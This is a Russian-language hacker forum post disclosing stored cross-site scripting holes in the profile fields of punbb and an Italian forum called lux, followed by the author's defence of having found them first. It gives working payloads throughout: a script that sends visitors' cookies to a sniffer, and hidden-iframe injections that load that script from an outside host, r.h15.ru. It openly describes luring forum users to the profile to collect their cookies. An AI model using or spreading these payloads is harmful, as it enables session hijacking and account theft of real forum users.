И опять дыра в профиле....что в принципе хорошо, для нас=) 1 уязвимость найдена мной в форуме punbb, позволяет вставить скрипт, в поле Jabber, что находится в профиле. Так как длинна ограничена 75 символами, следует кроме банального алерта Code: "><script>alert('')</script> стандартный скрипт для пересылки куков на снифф Code: <script>img = new Image(); img.src = "/cgi-bin/s.jpg?"+document.cookie;</script> вставить как бы и не удастся. Но мы поступим по другому. Зарегестрируем, к примеру, на .holm`e такой сайт: r.h15.ru и в корневую папку кинем html`овский файл index.html, со строкой Code: <script>img = new Image(); img.src = "/cgi-bin/s.jpg?"+document.cookie;</script> т.е. сделаем небольшой редирект на античатовский сниффер. Теперь, поместив в поле Jabber строку с невидимым фреймом Code: "><iframe src=http://r.h15.ru/index.html height=0></iframe> в котором отображается страница нашего редиректа, кукисы всех кто заглянет на эту страницу улетят на снифф античата. Осталось только заманить пользователей форума заглянуть в твой профайл, и можно идти собирать урожай=) 2 уязвимость найдена в форуме lux. Форум итальянский, и довольно распостраненный, у итальянцев. Тут, поле подверженное нашему воздействию называется MSN, количество вводимых символов ограничено 40, вставляем сплойт Code: "><iframe src=http://r.15.ru/ height=0> который занимает как раз 38 символа, и добываем кукисы.
Я тебе отвечаю, эти баги я нашел еще в конце февраля, до всяких там публикаций на секлабе. Релизить особо не спешил, думал может ещё что-то найду в них, но так как секлаб подосрал немного.........=( Баги нашел я, и нашел я их до публикации на секлабе, следует описать их тут я имею право.